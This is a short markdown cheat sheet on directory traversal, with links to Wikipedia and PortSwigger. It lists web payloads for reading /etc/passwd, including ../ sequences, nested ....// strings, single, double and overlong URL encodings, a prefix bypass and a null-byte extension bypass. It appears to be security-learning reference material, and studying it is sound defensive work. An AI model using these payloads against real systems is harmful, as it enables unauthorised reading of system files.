# Directory traversal

> A directory traversal attack exploits insufficient security validation or sanitization of user-supplied file names, such that characters representing "traverse to parent directory" are passed through to the operating system's file system API.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Directory_traversal_attack)

* [PortSwigger - Web Security Academy - Directory traversal](https://portswigger.net/web-security/file-path-traversal)

## Attacks

### Traversal sequence (dot dot slash)

For each `../` you step up one directory. Just repeat this until you are in the root directory and then build up the path to the desired file from there.

```url
../../../etc/passwd
```

### Absolute path

Sometimes you can just supply an absolute path.

```url
/etc/passwd
```

### Bypass filters

#### Nested traversal sequences

When the traversal sequence is only stripped once rather than recursively, you can use nested sequences: after the inner sequence is stripped, a traversal sequence still remains, so `....//` becomes `../`.

```url
....//....//....//etc/passwd
```

#### URL encoding

Single URL encoding

```url
%2e%2e%2f
```

Double URL encoding (the `%` character is itself encoded, as `%25`)

```url
%252e%252e%252f
```

Non-standard encodings

```url
..%c0%af
..%ef%bc%8f
```

#### Mandatory prefix

If the app checks for a specific prefix, you may still be able to add traversal sequences to the file path.

```url
/var/www/images/../../../etc/passwd
```

#### Null byte termination

If the app checks for certain file extensions, for example, you may be able to bypass the filter by supplying a null byte `%00`, which terminates the string early.

```url
../../../etc/passwd%00.jpg
```
